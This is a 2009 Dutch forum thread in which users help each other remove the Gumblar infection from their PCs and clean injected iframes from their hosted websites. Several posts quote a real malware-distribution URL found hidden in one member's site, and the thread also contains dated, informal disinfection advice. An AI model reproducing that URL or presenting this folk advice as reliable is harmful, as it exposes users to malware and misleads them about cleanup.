MissBliss | dinsdag 11 augustus 2009 @ 15:49 | |
Oh balen ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:49 | |
Het bestand in file:///C:/Users/Qwea/AppData/Roaming/Mozilla/Firefox/Profiles/zgodd7xy.default/ en dan die formhistory kan ook gewoon niet verwijderd worden ![]() ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:50 | |
quote:echt ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:52 | |
quote:Mn hijackthis log. Roept u maar! | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 15:53 | |
quote:Ik geloof je wel hoor. ![]() ![]() Verwijder hem maar snel. ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 15:53 | |
Je hebt toch Vista? Daar kon het toch juist niet op komen? ![]() | ||
Swetsenegger | dinsdag 11 augustus 2009 @ 15:53 | |
quote:Nou dan heb je nog weinig spannende data. Formateren maar. | ||
Qwea | dinsdag 11 augustus 2009 @ 15:54 | |
quote:ik heb nooit spannende data wat niet 30x gebackupt is. Eerst eens zien of het met hijackthis en malware wil. Zo niet pleur ik straks alles wel leeg. Wat ik me afvraag... bij het installen van de pc is er een backup gemaakt toen windows klaar was... kan ik die gewoon terug zetten? of zit dat kreng daar ook in ? ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 15:55 | |
quote:als jij mn hijackthis log wil checken? | ||
Qwea | dinsdag 11 augustus 2009 @ 15:55 | |
quote:dikke stront dus, blijkbaar ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 15:59 | |
quote:'t ziet er goed uit juist. Hardnekkig die Gumblar. Kan je ook Malwarebytes erop los laten? O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) <<< Fix checked oobefldr.dll <<< Onderdeel van Vista? Denk t wel. http://www.google.nl/search?hl=nl&q=oobefldr.dll&btnG=Zoeken&meta=lr%3Dlang_nl | ||
Qwea | dinsdag 11 augustus 2009 @ 16:01 | |
quote:Malware is al bezig. Hijack was eerder klaar ![]() Windows errors related to oobefldr.dll? oobefldr.dll is a process belonging to the Microsoft® Windows® Operating System program . "oobefldr.dll is a Welcome Center Component" "from Microsoft Corporation" "belonging to Microsoft® Windows® Operating System" ik hoef dus niks te verwijderen en kan hem (hijackthis) afsluiten? | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 16:04 | |
quote:Nee niet echt, die (no file) kun je eventueel verwijderen, maar de rest niet. Die no file doet niks zeg maar ![]() Ok. Laat die dll maar staan idd. ![]() | ||
Swetsenegger | dinsdag 11 augustus 2009 @ 16:05 | |
Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 16:08 | |
quote:Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthield ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:08 | |
quote:O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file) weggepleurd ![]() Nou, nu maar ff wachten op malwarebytes | ||
Qwea | dinsdag 11 augustus 2009 @ 16:08 | |
quote:ja, daar kwam MM gisteren ook achter ![]() ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 16:09 | |
quote:Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd. Kwestie belangrijk spul even doorscannen en dan verplaatsen naar USB stick. Vervolgens alleen die ene schijf formatteren... | ||
Qwea | dinsdag 11 augustus 2009 @ 16:10 | |
quote: ![]() ![]() ![]() Dan kan ik dus gewoon als al dit niet helpt straks f4 doen en alles terug zetten ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:11 | |
Adaware vondt enkel koekjes | ||
Swetsenegger | dinsdag 11 augustus 2009 @ 16:12 | |
quote:vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website. tegenwoordig zet Filezilla gewoon 'ikke' in een bestandje. platte tekst dus. Niet gecodeerd. En zo komt gumbar aan passwords. Wat andere ftp clients doen weet ik niet. | ||
Qwea | dinsdag 11 augustus 2009 @ 16:12 | |
edit. Nutteloos logje, aangezien het de smart scan was. Wel de full doen, Q ![]() | ||
CasB | dinsdag 11 augustus 2009 @ 16:13 | |
quote:Gumblar is toch (ook) een packet sniffer, die je passwords jat als je inlogt, en ze dus niet uitleest uit een bestand? | ||
MissBliss | dinsdag 11 augustus 2009 @ 16:14 | |
quote:Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla? | ||
Qwea | dinsdag 11 augustus 2009 @ 16:15 | |
quote:Andere ftp prog nemen? Heeft jouw malware dinges al wat gevonden? | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 16:16 | |
quote:Geniaal!! ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 16:17 | |
quote:Ik heb zo lang gezocht naar een handig ftp-prog ![]() Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevonden ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:19 | |
quote:Ik draai malware, en adaware ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 16:19 | |
SuperAntiSpyWare is ook goed, samen met Malwarebytes een van de betere op dit moment.. | ||
MissBliss | dinsdag 11 augustus 2009 @ 16:21 | |
Dingen als in de register kijken heb ik niet echt verstand van ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:22 | |
MM kwam met het briljante idee om FF af te sluiten en dan de files zoals die C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\formhistory dinges te verwijderen. ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:24 | |
zodra ik ff weer opnieuw opstart en naar C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\ ga is formhistory.sqlite er weer ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 16:30 | |
Wat zei ik nou net over aVast... ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:34 | |
quote:Nou, ja, ![]() ![]() ![]() Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladen ![]() malware bytes is wel een poosje bezig zeg ![]() | ||
CasB | dinsdag 11 augustus 2009 @ 16:35 | |
quote:formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat. | ||
Qwea | dinsdag 11 augustus 2009 @ 16:36 | |
quote:aaah ![]() nou ja, de oude is iig weg ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 16:38 | |
quote:Nou ja, aVast detecteert het probleem, dat is iig wat meer dan andere virusscanners doen.. Ja, full scan duurt een tijdje... | ||
Re | dinsdag 11 augustus 2009 @ 16:38 | |
quote:ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:38 | |
![]() ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:39 | |
quote:avast ziet hem hier niet eens ![]() | ||
Re | dinsdag 11 augustus 2009 @ 16:39 | |
bij IT zijn ze trouwens ook nog bezig op mijn laptop ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:40 | |
quote:Ik vind dat ze de kutklerelijers van zo'n virus voor een trein moeten duwen ![]() | ||
Re | dinsdag 11 augustus 2009 @ 16:40 | |
quote:ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgt | ||
MissBliss | dinsdag 11 augustus 2009 @ 16:42 | |
quote:Heb ik iets gemist? Is avast niet goed? ![]() Anyway: superantispyware heeft alleen cookies gevonden. | ||
Qwea | dinsdag 11 augustus 2009 @ 16:43 | |
quote:Ja... alleen ik maar hopen dat ik toch geen gumblar had ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 16:47 | |
eeeeeeeeeeeeeeeeehm?quote: | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 16:53 | |
quote:Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht. Tevens staan er ook vaak rare opstartverwijzingen in MSconfig bij het tabblad Services en Startup. Dus alle verdachten verwijzingen daar ook verwijderen cq. uitvinken. Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen.. Anyways dit was een aardig tijdrovend karwei en achteraf had ik me bedacht dat formatteren een iets snellere oplossing zou zijn. | ||
Qwea | dinsdag 11 augustus 2009 @ 16:57 | |
quote:Ik heb geboot, en draai opnieuw malwarebytes. Alstie namelijk na een boot terug komt, moet ik er nu ook weer zijn. Ik ga eens even in het register loeren | ||
An24 | dinsdag 11 augustus 2009 @ 17:01 | |
Hier dus ook zelfde probleem. Zit ook bij pc extreme. Ik had ook een trojan op mijn pc zitten, maar nu is pc helemaal schoon. Het virus staat dan ook niet lokaal, maar komt alleen van de server vandaan> Dizer helpt ook mij door het probleem heen. (En natuurlijk zegt pc extreme dat ze het niet snappen, zou ik ook zeggen ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:05 | |
Overigens gefeliciteerd met dit topic, je staat nu in de top 10 Google searches voor Gumblar virus ![]() ![]() Verder hier nog een handige link voor mensen die willen controleren of hun website geïnfecteerd is door dat Gumblar. http://unmaskparasites.com/ | ||
MissBliss | dinsdag 11 augustus 2009 @ 17:07 | |
quote:Ik begin ook te denken dat het virus niet (meer) op deze pc staat. | ||
Qwea | dinsdag 11 augustus 2009 @ 17:08 | |
hij lijkt niet in mn register voor te komen, ook ;![]() ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:16 | |
Nou goed eerste stap is gezet, als het virus niet meer op de pc's staat moet het alleen nog van al je eigen gemaakte websites gehaald worden.quote: [ Bericht 0% gewijzigd door Mr.Noodle op 11-08-2009 17:22:12 ] | ||
Qwea | dinsdag 11 augustus 2009 @ 17:20 | |
quote:ik draai geen ftp prog hier ![]() Vraag me alleen af of hij ECHT weg is | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:21 | |
quote:Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan. Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin.. | ||
MissBliss | dinsdag 11 augustus 2009 @ 17:22 | |
Is er een makkelijke manier om in dat register te kijken dan? | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:23 | |
quote:Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden? | ||
Qwea | dinsdag 11 augustus 2009 @ 17:25 | |
quote:voor die referenties.. moet ik dan alles handmatig nalopen? ![]() ik kan in services geen gumblar vinden | ||
MissBliss | dinsdag 11 augustus 2009 @ 17:27 | |
quote:Die is nog bezig ![]() Maar hoe weet ik nou ooit of het echt weg is? ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:28 | |
quote:Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren.. Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat.. | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:28 | |
quote:Bij een format, weet je zeker dat het echt weg is.. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 17:31 | |
quote:Stomme vraag, maar waar vind ik die? Bij current user en dan software oid? | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:32 | |
quote:Current user en Local Machine en check je hosts-file en je lmhosts.sam [ Bericht 2% gewijzigd door Mr.Noodle op 11-08-2009 17:41:04 ] | ||
MissBliss | dinsdag 11 augustus 2009 @ 17:33 | |
quote: ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:37 | |
quote:Sorry, maar dit is echt eerlijk geantwoord. Ik weet ook niet alles, virussen van tegenwoordig volgen geen vast patroon meer, als in niet altijd dezelfde bestandsnamen, andere verwijzingen, verschillende locaties en programma's die ze infecteren. Ligt maar net aan wat er allemaal op de PC aan software staat. Ik kan er niet op kijken.. Format is tenminste wel alles schoon... | ||
MissBliss | dinsdag 11 augustus 2009 @ 17:38 | |
Ja, ik snap het wel, maar formatteren is echt een laatste redmiddel hoor, imho. Ik ga eerst wel aan de slag met al die programma's enzo. | ||
Qwea | dinsdag 11 augustus 2009 @ 17:40 | |
quote:en die host files staan daar ook? | ||
Qwea | dinsdag 11 augustus 2009 @ 17:42 | |
geen gumblar in mijn register met crtl +f superantispyware vindt 4 cookies | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:44 | |
quote:Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware. Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt. | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:46 | |
quote:Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden? ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 17:48 | |
ik kan geen search files vinden van IE. Wat is dit eigk? ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:49 | |
Overigens ben ik er vandoor, ik lees het vannacht wel allemaal wel weer.. suc-6 iig.. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 17:49 | |
quote:*gaat zoeken in C : windows | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 17:52 | |
quote:Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook. "SearchUrl" is overigens wel handig om die nog even te controleren in het register, net een paar keys erboven. Daar staan volgens mij alle urls van je zoekmachine van je browser in. | ||
Qwea | dinsdag 11 augustus 2009 @ 17:52 | |
zoeken in de windows search op hosts levert geen bestanden op ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 17:52 | |
quote:aah wel tof trouwens, je hulp | ||
MissBliss | dinsdag 11 augustus 2009 @ 17:59 | |
quote:Ja oke, maar een format C kost ook een berg tijd en moeite hoor! Eerst het backuppen en daarna weer alles terugzetten en programma's opnieuw installeren enzo. | ||
MissBliss | dinsdag 11 augustus 2009 @ 18:06 | |
Dinges is klaar! Hier de log: quote: | ||
Qwea | dinsdag 11 augustus 2009 @ 18:26 | |
belangrijke vraag ; ik heb een recovery van samsung terug gezet vanaf het moment (6aug) dat ik hem kreeg. Hij heeft alle bestanden op C gewist, en de gegevens die op 6aug gemaakt zijn terug gezet. Ik hoefde alleen geen windows te installeren... kan ik er nu wel of niet vanuit gaan dattie weg is? | ||
MissBliss | dinsdag 11 augustus 2009 @ 18:40 | |
Qwea, zie jij nog iets interessants in het log hierboven? Als in: gefeliciteerd MB, het virus is nu weg! ![]() IE doet overigens niks raars hier ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 18:44 | |
alles wat ie gevonden heeft, is gedelete. Ik zou hem voor de zekerheid opnieuw opstarten en nog eens runnen. Mijn windows is al 7 minuten bezig met aflsuiten ![]() | ||
An24 | dinsdag 11 augustus 2009 @ 18:47 | |
PC extreme gebeld. Ze zijn dus al langer bekend met het virus, maar komen er maar niet achter waar hij bij hun psies vandaan komt. De collega die dit behandeld belt mij morgenochtend om 9 uur terug ![]() Ik ga het echt niet zelf oplossen he, ze geven nu gewoon toe dat ze wel degelijk het probleem vormen in ons geval, MB! | ||
MissBliss | dinsdag 11 augustus 2009 @ 18:49 | |
quote: ![]() Nou, lekker dan ![]() Ik ben benieuwd naar wat ie je morgen te zeggen heeft! | ||
MissBliss | dinsdag 11 augustus 2009 @ 18:53 | |
Heb je de helpdesk a 45ct per minuut gebeld? Want nu wil ik ze ook bellen. | ||
freud | dinsdag 11 augustus 2009 @ 18:59 | |
Het is ook best triest van PCExtreme... Zocht even snel online, en er zijn veel mensen met klachten. Lokaal bij An24 geen virussen (gescand met meerdere scanners), en alleen de bestanden aan de kant van PCE zijn veranderd. Zeer slecht dat ze uberhaupt geinfecteerd zijn, en nog triester dat ze blijkbaar wintel servers hebben (en geen *UX). Je kan van ook redelijk snel zoeken op dit virus. In windows de drive selecteren met rechts waar je html/php bestanden staan. Kies dan 'search' (of zoeken). In het bovenste invoerveld voer je dan in *.php, *.htm* in, en in het veld eronder .in:8080. Dan op search/zoeken klikken, en je krijgt alle files te zien waar de iframe is ingevoegd. Het weghalen van deze code moet je natuurlijk pas doen als de veroorzaker van je pc af is. Je kan dan met zoeken en vervangen dit weghalen. Ik heb zelf met Crimson Editor dit gedaan, omdat je dan in alle bestanden het in een keer kan doen (ok, in batches van 500 files tegelijk). Maar goed, ik zou een goeie claim neerleggen bij PCExtreme... | ||
Qwea | dinsdag 11 augustus 2009 @ 19:03 | |
in mijn samsung recovery solution staat dus als je volledig herstel doet ; Overschrijft station C: volledig met een backup image om de computer volledige in de eerdere toestand terug te brengen. Dan is dat toch goed genoeg? Want 6aug was er niks aan de hand ![]() Nog ff in safe mode alles draaien voor de zekerheid | ||
MissBliss | dinsdag 11 augustus 2009 @ 19:04 | |
quote:Ik heb ze gebeld, tegen mij zijn ze nog in de ontkenningsfase ![]() Ik moet iig mailen en ze gaan aan de slag ofzo. quote:Oh, dat ga ik proberen! | ||
MissBliss | dinsdag 11 augustus 2009 @ 19:16 | |
quote:Niks gevonden! ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 19:27 | |
Sorry dat ik zo snel weg was. ![]() Maar @MissBliss, je hebt al gescant naar een reboot? Trojan.Agent heeft namelijk het patroon om ook na een reboot terug te komen. | ||
MissBliss | dinsdag 11 augustus 2009 @ 19:32 | |
Nu bezig met een scan na reboot. | ||
Qwea | dinsdag 11 augustus 2009 @ 19:33 | |
quote:Wat vindt jij van die volledig herstel van mij? | ||
Qwea | dinsdag 11 augustus 2009 @ 19:34 | |
quote:Same here, maar dan ook na een volledig herstel ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 19:36 | |
quote:Ik vind het raar dat ie er opeens niet meer is. ![]() Edit: ja, je heb in feite inderdaad een "image" van je computer terug gezet vóór de infectie. Dat is altijd ook goed mogelijk. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 19:37 | |
quote:Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks. Logje van nu ; quote: | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 19:38 | |
Dit is combofix voor de geïnteresseerden. Ik gebruik het niet, maar goed hier is een guide. Het is op eigen risico. http://www.bleepingcomputer.com/combofix/how-to-use-combofix | ||
Qwea | dinsdag 11 augustus 2009 @ 19:38 | |
wat is combofix trouwens? Ooh en avast doet nu voordat windows opgestart is een scan ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 19:39 | |
quote:Dat zit wel goed! ![]() | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 19:40 | |
quote:Combofix is ook een soort Malwarebytes, maar het is alleen in een CMD bestand. Ik vind het risicovol, want hij wijzigt ook je systeem tijdelijk tijdens de scan. Na de scan als je hem verwijderd wordt alles wel normaal. (je moet zelf nog wel wat aanpassen maar goed.) Ik gebruik het alleen als een laatste redmiddel. | ||
CantFazeMe | dinsdag 11 augustus 2009 @ 19:42 | |
En ik raad je het niet aan om aan te beginnen als je er niks van af weet. ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 19:43 | |
quote:*netjes afblijft *wacht totdat avast eindelijk eens klaar is. Hij is pas op 1% ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 19:43 | |
werkelijk, als het zo'n tering gedoe is om het te verwijderen, betreur ik de bedrijven die ermee besmet zijn ![]() | ||
freud | dinsdag 11 augustus 2009 @ 20:46 | |
Het is trouwens ook wel aan te bevelen om na het scannen met je eigen virusscanner, nog een andere te draaien. Symantec en mcafee bieden online scanners aan. Is wel aan te raden om die ook nog eroverheen te gooien, just in case. | ||
Qwea | dinsdag 11 augustus 2009 @ 20:48 | |
quote:Ik wilde online scannen van trend micro.. maar dat ding doet het hierzo niet ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 20:49 | |
en symantec = o.a norton en mcafee bleken volgens vele site's compleet clueless voor het virus... dus waarom zouden die hem dan wel online detecteren? | ||
Qwea | dinsdag 11 augustus 2009 @ 20:51 | |
trouwens MB ; ding al klaar? nog wat gevonden? | ||
MissBliss | dinsdag 11 augustus 2009 @ 20:52 | |
quote:Ja, klaar en niks gevonden ![]() Misschien zet ik zo avast nog maar een keer aan ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 21:02 | |
quote:nice! Ze zijn in de SC ook allemaal aant scannen omdat ze op je site zijn geweest ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 21:04 | |
Ja, ik had zelfs gevraagd: goh, doet mijn site ook raar bij jullie? ![]() ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 21:06 | |
quote:ik heb greys ook maar een PM gedaan ![]() | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 23:34 | |
Eindelijk opgelost dus? ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 23:37 | |
quote:Hier wel lijkt het. Image van de dag dat ik de laptop kreeg (6 aug) terug gezet... en volgens de buurman en mistermaniac is dat voldoende omdat ook de reg sleutels worden overschreven. Toen in safemode maleware bytes gedraait, niks gevonden. Toen voor het opstarten in windows avast laten runnen, niks gevonden. Moet enkel nog de online scan van trend micro doen, maar dat doek morgen wel. | ||
Mr.Noodle | dinsdag 11 augustus 2009 @ 23:49 | |
Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed. MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft. Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites.. Net nog even gecheckt, de website van MissBliss is nog steeds "Suspicious" Die hidden link "http://c6h.at:8080/ts/in.cgi?pepsi138" (overigens niet op klikken) is er nog steeds.. [ Bericht 0% gewijzigd door Mr.Noodle op 11-08-2009 23:54:36 ] | ||
Qwea | dinsdag 11 augustus 2009 @ 23:53 | |
quote:Ik zal mijn website eens bekieken | ||
Qwea | dinsdag 11 augustus 2009 @ 23:53 | |
External References No external references found. ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 23:54 | |
quote:Dizer gaat mijn website opnieuw online zetten en mijn ww veranderen. Ik laat hem dit wel even lezen! Je hebt ge-edit: nee klopt, mijn site heb ik niks meer aan gedaan sinds gisteren, dus het virus zit daar nog steeds in! Dizer moet hem offline halen en opnieuw uploaden ![]() | ||
Qwea | dinsdag 11 augustus 2009 @ 23:54 | |
MissBliss je website ; This page seems to be <suspicious> * <IFrame> hidden link - http://c6h.at:8080/ts/in.cgi?pepsi138 ![]() | ||
MissBliss | dinsdag 11 augustus 2009 @ 23:56 | |
Klopt, zie post boven je! | ||
Qwea | dinsdag 11 augustus 2009 @ 23:58 | |
seen ![]() | ||
freud | woensdag 12 augustus 2009 @ 21:23 | |
Goeie site, je kan alleen niet zien in welke pagina de link zit ![]() | ||
St4ck3r | woensdag 12 augustus 2009 @ 23:15 | |
Ik heb nu zelf ongeveer 15 van dit soort klanten gehad (ISP) Zoals ik eerder al vermelde, zorg eerst dat je eigen pc schoon is! Pleur je FTP programma er even af en draai verschillende virusprogramma's + spyware scanners. Daarna laat je eerst (of doe je zelf) je wachtwoorden wijzigen.. Deze zijn namelijk nu bekend bij het desbetreffende virus.. In de tussentijd laat je iemand wiens PC wél clean is even het iframe verwijderen. This should do... | ||
Qwea | woensdag 12 augustus 2009 @ 23:17 | |
quote:Ja, this should do, vergeet je niet dat dat ding (ik las ergens op google al 9x zoiets) zich soms terug zet na reboot ![]() | ||
St4ck3r | woensdag 12 augustus 2009 @ 23:29 | |
Tja, in theorie had ik me eigen pc al lang een herinstall gegeven... Maar heb zelf 14 hostingpakketten en daar heb ik nergens last van... | ||
Qwea | woensdag 12 augustus 2009 @ 23:32 | |
quote:mijne is mooi schoon na een nieuwe image terugzetten ![]() 9 min, wast gebeurt ![]() | ||
MissBliss | woensdag 12 augustus 2009 @ 23:35 | |
Mijn pc is ook schoon geloof ik. | ||
St4ck3r | woensdag 12 augustus 2009 @ 23:38 | |
Geloven doen we in de kerk ![]() | ||
Mr.Noodle | donderdag 13 augustus 2009 @ 00:18 | |
quote:Volgens is het altijd direct je index pagina. Zeker omdat je na de domeinnaam geen aparte bestandsnaam opgeeft. Houdt dus in je standaard index.php, htm, html, asp, nogwattes meuk.. | ||
MissBliss | donderdag 13 augustus 2009 @ 00:40 | |
quote:Zeker weten kan ik het niet zonder format las ik in dit topic ![]() Ik merk het vanzelf wel als ik iets update op de site ![]() | ||
MissBliss | donderdag 13 augustus 2009 @ 00:45 | |
Mijn website doet het weer ![]() | ||
Mr.Noodle | donderdag 13 augustus 2009 @ 01:07 | |
Eindelijk af van je DOA's... ![]() | ||
MissBliss | donderdag 13 augustus 2009 @ 01:24 | |
This page seems to be <clean> | ||
Swetsenegger | donderdag 13 augustus 2009 @ 08:41 | |
Dus... de oplossing was voor de meeste een complete reinstall van hun PC? | ||
Re | donderdag 13 augustus 2009 @ 09:38 | |
quote:nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan ![]() | ||
Swetsenegger | donderdag 13 augustus 2009 @ 09:40 | |
quote:Christ... | ||
Dizer | donderdag 13 augustus 2009 @ 10:37 | |
quote:Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!! Weg met al het gezeur wat je altijd hebt op de computer. Weg met alle virussen die je telkens hebt.... Weg met al je HD gezeur dat elke keer niet werkt, zet er 2 TB externe HD's naast.. Weg met moederbord dat ontploft... ![]() 24" LED Scherm 2.66 GHZ dual core 4 GB geheugen 640 GB HD 1399 incl BTW ![]() En voor 1699 incl BTW heb je een nog snellere! | ||
Qwea | donderdag 13 augustus 2009 @ 10:38 | |
quote:nou, dat was hier wel de snelste manier ja ![]() ![]() | ||
Qwea | donderdag 13 augustus 2009 @ 10:41 | |
quote: ![]() ![]() | ||
Dizer | donderdag 13 augustus 2009 @ 10:59 | |
quote:Ja maar je kent Re niet en zijn computers. Nachtenlang heb ik er aan moeten werken elke keer ![]() | ||
MissBliss | donderdag 13 augustus 2009 @ 11:03 | |
Ik heb geen 1399 rondslingeren. | ||
Re | donderdag 13 augustus 2009 @ 11:07 | |
ja ja, kan hem natuurlijk wel weer van de belastingen aftrekken ![]() | ||
Qwea | donderdag 13 augustus 2009 @ 11:24 | |
quote:Als je écht voor een mac gaat, neem dan die van 1699 | ||
Mr.Noodle | donderdag 13 augustus 2009 @ 13:16 | |
quote:Snap je waarom mensen nu over gaan op Mac.. ![]() | ||
Swetsenegger | donderdag 13 augustus 2009 @ 14:01 | |
